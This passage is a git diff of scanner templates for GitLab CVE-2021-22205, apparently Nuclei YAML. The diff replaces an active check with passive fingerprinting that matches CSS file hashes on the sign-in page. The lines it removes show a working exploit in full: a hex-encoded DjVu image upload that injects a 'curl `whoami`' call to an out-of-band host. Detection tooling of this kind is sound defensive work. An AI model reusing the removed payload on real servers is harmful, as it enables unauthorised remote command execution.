diff --git a/cves/2021/CVE-2021-22205-fingerprint.yml b/cves/2021/CVE-2021-22205-fingerprint.yml deleted file mode 100644 index 74802c447a..0000000000 --- a/cves/2021/CVE-2021-22205-fingerprint.yml +++ /dev/null @@ -1,127 +0,0 @@ -id: CVE-2021-22205-fingerprint - -info: - name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool (No Exploit) - author: GitLab Red Team - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. - reference: - - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator - - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json - - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/ - - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - - https://hackerone.com/reports/1154542 - - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 - tags: cve,cve2021,gitlab,rce,oast,fingerprinting - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.90 - cve-id: CVE-2021-22205 - cwe-id: CWE-20 - -requests: - - method: GET - path: - - "{{BaseURL}}/users/sign_in" - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - condition: or - words: - - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df" - - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b" - - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce" - - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290" - - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59" - - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753" - - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f" - - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4" - - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4" - - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6" - - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959" - - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369" - - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae" - - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f" - - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2" - - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1" - - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac" - - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86" - - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087" - - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86" - - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d" - - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd" - - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514" - - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09" - - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e" - - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb" - - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3" - - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1" - - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54" - - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8" - - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b" - - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44" - - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117" - - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2" - - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e" - - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160" - - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb" - - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c" - - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf" - - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71" - - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51" - - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a" - - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f" - - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2" - - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca" - - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb" - - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b" - - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5" - - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d" - - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f" - - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab" - - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9" - - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9" - - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5" - - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3" - - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1" - - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b" - - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e" - - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b" - - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e" - - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528" - - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9" - - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5" - - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8" - - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b" - - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711" - - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445" - - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca" - - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a" - - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7" - - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4" - - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218" - - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4" - - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c" - - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71" - - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb" - - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c" - - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f" - - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56" - - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3" - - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a" - - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0" - - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687" - - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d" - - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd" - - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83" - - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812" - - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649" - - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11" - extractors: - - type: regex - name: matched_hash - group: 1 - regex: - - '(?:application-)(\S{64})(?:\.css)' \ No newline at end of file diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml index 9315682bf1..7da8674932 100644 --- a/cves/2021/CVE-2021-22205.yaml +++ b/cves/2021/CVE-2021-22205.yaml @@ -1,63 +1,128 @@ id: CVE-2021-22205 info: - name: GitLab CE/EE Unauthenticated RCE using ExifTool - author: pdteam + name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection + author: GitLab Red Team severity: critical - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. reference: + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator + - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json + - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/ - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 - tags: cve,cve2021,gitlab,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.90 cve-id: CVE-2021-22205 cwe-id: CWE-20 + tags: cve,cve2021,gitlab,rce requests: - - raw: - - | - GET /users/sign_in HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} + - method: GET + path: + - "{{BaseURL}}/users/sign_in" - - | - POST /uploads/user HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 - X-CSRF-Token: {{csrf-token}} - - {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} - - cookie-reuse: true - matchers-condition: and + redirects: true + max-redirects: 3 matchers: - type: word words: - - 'Failed to process image' - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - - type: status - status: - - 422 + - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df" + - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b" + - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce" + - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290" + - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59" + - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753" + - "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f" + - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4" + - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4" + - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6" + - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959" + - "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369" + - "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae" + - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f" + - "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2" + - "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1" + - "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac" + - "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86" + - "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087" + - "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86" + - "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d" + - "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd" + - "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514" + - "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09" + - "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e" + - "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb" + - "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3" + - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1" + - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54" + - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8" + - "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b" + - "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44" + - "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117" + - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2" + - "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e" + - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160" + - "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb" + - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c" + - "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf" + - "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71" + - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51" + - "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a" + - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f" + - "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2" + - "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca" + - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb" + - "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b" + - "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5" + - "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d" + - "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f" + - "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab" + - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9" + - "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9" + - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5" + - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3" + - "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1" + - "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b" + - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e" + - "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b" + - "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e" + - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528" + - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9" + - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5" + - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8" + - "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b" + - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711" + - "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445" + - "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca" + - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a" + - "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7" + - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4" + - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218" + - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4" + - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c" + - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71" + - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb" + - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c" + - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f" + - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56" + - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3" + - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a" + - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0" + - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687" + - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d" + - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd" + - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83" + - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812" + - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649" + - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11" + condition: or extractors: - type: regex - name: csrf-token - internal: true group: 1 regex: - - 'csrf-token" content="(.*?)" />\n\n\n\n